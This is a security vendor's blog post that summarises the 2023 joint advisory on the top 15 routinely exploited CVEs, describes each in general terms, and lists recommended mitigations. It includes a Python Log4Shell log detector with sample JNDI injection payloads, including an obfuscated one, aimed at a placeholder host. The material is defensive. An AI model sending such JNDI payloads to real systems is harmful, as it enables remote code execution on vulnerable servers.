
2023 Top Routinely Exploited Vulnerabilities: Zero-day Exploits on the Rise

The 2023 Top Routinely Exploited Vulnerabilities Joint Cybersecurity Advisory has been released by the Five Eyes intelligence community (US, UK, Canada, Australia, New Zealand). Available through the website of the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) division, the report details the Common Vulnerabilities and Exposures (CVEs) most frequently exploited by bad actors, designated by their Common Weakness Enumerations (CWEs).

The report highlights key trends in cyberattacks and recommends mitigations for vendors, designers, developers, and end-user organizations. In this blog, we'll share some key insights from the report including:

  • What the report reveals about the rise in zero-day exploits
  • The top 15 routinely exploited vulnerabilities of 2023
  • The top three recommended mitigations

Rise in Zero-Day Exploits Targeting Enterprises

The Joint Cybersecurity Advisory reveals that attackers exploited more zero-day vulnerabilities to penetrate enterprise networks in 2023 than in 2022, enabling them to focus on bigger targets. The majority of the most commonly exploited vulnerabilities started as zero-day attacks, up from less than half the previous year.

Attackers see the greatest results exploiting vulnerabilities within two years of their public revelation. As time goes on and more patches and upgrades are released, vulnerabilities yield increasingly lower returns for attackers. International efforts to reduce the lifespan of vulnerabilities also degrade their value to bad actors.

Top 15 Routinely Exploited Vulnerabilities in 2023

The Joint Cybersecurity Advisory identified these as the 15 most frequently exploited CVEs of 2023:

  1. CVE-2023-3519
  2. CVE-2023-4966
  3. CVE-2023-20198
  4. CVE-2023-20273
  5. CVE-2023-27997
  6. CVE-2023-34362
  7. CVE-2023-22515
  8. CVE-2021-44228
  9. CVE-2023-2868
  10. CVE-2022-47966
  11. CVE-2023-27350
  12. CVE-2020-1472
  13. CVE-2023-42793
  14. CVE-2023-23397
  15. CVE-2023-49103

Here's a brief rundown on what each of these vulnerabilities targets and how it works:

1. CVE-2023-3519

Classified as critical, this vulnerability compromises Citrix NetScaler ADC and NetScaler Gateway. It allows an unauthenticated user to use an HTTP GET request to cause a stack buffer overflow in the NetScaler Packet Processing Engine (nsppe). Attackers can leverage this exploit to upload malicious files that enable remote code execution, privilege escalation, and credential access, setting the stage for discovery of system vulnerabilities and exfiltration of sensitive data. Read more from NIST.

2. CVE-2023-4966

Categorized as critical, this vulnerability targets Citrix NetScaler ADC and NetScaler Gateway. It allows attackers to read memory outside the intended buffer, including session tokens, which lets them impersonate authenticated users. Once the attacker has exploited this vulnerability, they can use it to perform reconnaissance on hosts and networks, harvest credentials, and move laterally within systems. Read more from NIST.

3. CVE-2023-20198

Considered critical, this vulnerability targets Cisco IOS XE Web UI. It enables unauthorized users to gain initial access and issue a command to create a local user and password combination, giving them the ability to log in with normal user access. Once the attacker has infiltrated the system, they can exploit other components of the UI and use the new user to escalate privileges to root privileges, gaining full administrator capability and effectively taking over the system. Read more from NIST.

4. CVE-2023-20273

Classified as high risk, this vulnerability targets Cisco IOS XE, building upon CVE-2023-20198. It leverages CVE-2023-20198 by using command injections to escalate privileges to root privileges. Read more from NIST.

5. CVE-2023-27997

Regarded as critical, this vulnerability targets Fortinet FortiOS and FortiProxy SSL-VPN. A heap-based buffer overflow lets a remote attacker execute arbitrary code or commands via specially crafted requests. Attackers can use this exploit to download config files from devices and add malicious administrator accounts. Read more from NIST.

6. CVE-2023-34362

Flagged as critical, this vulnerability targets Progress MOVEit Transfer. It uses an SQL injection vulnerability to obtain a sysadmin API access token. This enables bad actors to use deserialization calls to execute remote code. Attackers can potentially exploit this vulnerability to gain insights into database structure and use SQL statements to change or delete data. Read more from NIST.

7. CVE-2023-22515

Classified as critical, this vulnerability targets Atlassian Confluence Data Center and Server. It enables bad actors to exploit improper input validation. Through XWork2 middleware, arbitrary HTTP parameters can be transformed into getter/setter sequences, allowing runtime modification of Java objects. Attackers can use this exploit to create new administrator users and upload malicious plugins to execute arbitrary code. Read more from NIST.

8. CVE-2021-44228

Recognized as critical, this vulnerability (Log4Shell) targets Apache's Log4j library, a popular open source logging framework. Attackers can use this exploit to craft requests that execute arbitrary code. A hacker can take over a system, exfiltrate data, upload ransomware, or launch other attacks. Bad actors began exploiting the vulnerability after it was publicly disclosed in December 2021. Read more from NIST.
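Log4Shell fires when a logged string contains a JNDI lookup such as `${jndi:ldap://...}`, so the defender-side check is to scan request logs for that token. The detector below is an added example, not code from the advisory or from Cobalt; it goes slightly beyond the text by also collapsing the nested-lookup obfuscations (`${lower:j}`, `${::-j}`) that hide the token from a literal match. The log lines are constructed, and `example.invalid` is a placeholder host.

```python
import re
from typing import Dict, List

# Nested lookups that resolve to a single character, e.g. ${lower:j} -> j,
# ${upper:N} -> N, ${::-d} -> d (Log4j default-value syntax). The second
# alternative excludes braces so it never swallows an enclosing "${".
_NESTED = re.compile(r"\$\{(?:lower|upper):(\w)\}|\$\{[^{}]*:-(\w)\}", re.IGNORECASE)
# The JNDI lookup itself; group 1 is the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse single-character nested lookups until none remain."""
    prev = None
    while prev != s:
        prev = s
        s = _NESTED.sub(lambda m: m.group(1) or m.group(2), s)
    return s


def find_jndi(line: str) -> List[str]:
    """Return the JNDI schemes found in one log line (empty list if clean)."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a log and report each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        schemes = find_jndi(line)
        if schemes:
            hits.append({"line": n, "schemes": schemes, "text": line})
    return hits


# Constructed sample access-log lines (not real traffic); the User-Agent
# field is a common place for the lookup string to land in a log.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:r}mi://example.invalid/b}"',
    '10.0.0.7 - - "GET /docs HTTP/1.1" 200 "-" "price is ${total} dollars"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h['line']}: JNDI lookup via {h['schemes']}")
```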

9. CVE-2023-2868

Flagged as critical, this vulnerability targets the Barracuda Networks Email Security Gateway (ESG) Appliance. It allows bad actors to leverage input validation and sanitization errors to obtain unauthorized access and remotely execute system commands. According to the FBI, Chinese hackers have exploited this vulnerability to compromise computer networks. Read more from NIST.

10. CVE-2022-47966

Recognized as critical, this vulnerability targets multiple Zoho ManageEngine products that depend on Apache Santuario. It exploits improper validation of XML signatures in SAML assertions, enabling unauthenticated users to submit a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint and execute arbitrary code. This allows attackers to seize control of servers in order to steal data, upload malware, or disrupt systems. Read more from NIST.

11. CVE-2023-27350

Treated as critical, this vulnerability targets the PaperCut MF/NG print management system. It exploits improper access control in the SetUpCompleted class to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code. Advanced persistent threat actors and ransomware groups have exploited this vulnerability. Read more from NIST.

12. CVE-2020-1472

Regarded as a critical threat by the National Vulnerability Database and a medium threat by Microsoft, this vulnerability targets Microsoft Netlogon. It allows unauthorized users to use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol. Attackers can exploit this vulnerability to escalate privileges. This CVE has appeared on the top routinely exploited vulnerabilities lists every year since 2021. Read more from NIST.

13. CVE-2023-42793

Categorized as a critical risk, this vulnerability targets JetBrains TeamCity servers. It enables an authentication bypass which allows attackers to launch remote code execution against susceptible servers. Bad actors can use this vulnerability to gain administrative control of servers and launch supply chain attacks. Read more from NIST.

14. CVE-2023-23397

Flagged as critical, this vulnerability targets Microsoft Office Outlook. Threat actors can exploit it by sending specially crafted emails that the Outlook client triggers automatically when it processes them, without any user interaction. Attackers can use this vulnerability to escalate privileges. Russian actors have targeted this vulnerability, which has been exploited since at least April 2022.

15. CVE-2023-49103

Classified as a high risk by the National Vulnerability Database and a critical risk by MITRE, this vulnerability targets the ownCloud graphapi file sharing platform extension. This vulnerability allows unauthenticated users to target URL endpoints to leak sensitive information and gain access to data such as admin passwords, mail server credentials, and license keys.

Top Three Recommended Mitigations

To mitigate zero-day vulnerabilities, the Joint Cybersecurity Advisory recommends prioritizing three main strategies:

  1. Adopt a security-centered approach to product development lifecycles
  2. Promote incentives for vulnerability disclosure
  3. Deploy endpoint detection and response (EDR) tools

1. Adopt a Security-centered Approach to Product Development Lifecycles

Patching zero-day vulnerabilities after they've been exploited gives bad actors a head start, and catching up can be lengthy and expensive. Software providers can gain an advantage on attackers by pre-emptively integrating security into the product development lifecycle. Robust testing and threat modeling can be implemented early in software development, reducing the likelihood of vulnerabilities emerging after products have been released. Accordingly, recent cybersecurity legislation such as the EU's Cyber Resilience Act requires developers to design products with security considerations in mind.

2. Promote Incentives for Vulnerability Disclosure

The Joint Cybersecurity Advisory report found that international cooperation to mitigate vulnerabilities reduced their lifespan, giving attackers a shorter window of opportunity to exploit them. Accordingly, the report recommends reducing barriers to responsible vulnerability disclosure by offering incentives. For instance, bug bounty reporting programs reward researchers with compensation and recognition for their contributions, providing a strong incentive to promote disclosure.

3. Deploy Endpoint Detection and Response (EDR) Tools

Endpoint detection and response tools use technologies such as artificial intelligence and automation to monitor networks for security incidents and respond to threats. Deploying EDR tools can accelerate detection of zero-day exploits and reduce their window of vulnerability. At least three of the top 15 vulnerabilities covered in the Joint Cybersecurity Advisory report were uncovered following EDR system reports of suspicious activity or device anomalies.

Identify and Remediate Vulnerabilities with Cobalt

Open vulnerabilities can wreak havoc on your system, but they depend on stealth to remain undetected. You can regain the advantage over attackers by deploying defenses informed by the latest CVE updates.

Cobalt helps you prevent exploits by providing Penetration Testing as a Service (PTaaS). Our team of pentesting experts help you test your system for exposure to vulnerabilities. Our user-friendly platform makes it easy for your team to collaborate with ours to rapidly schedule customized pentests, detect risks, and mitigate them. 

Get started by scheduling a demo to see how we can help you keep your network secure against exploits.

About the author: Apporwa Verma has 7+ years of experience in DAST, SAST, VAPT, mobile and web pentesting, DevSecOps, and GRC, with a Master's degree in Computer Science and Information Security.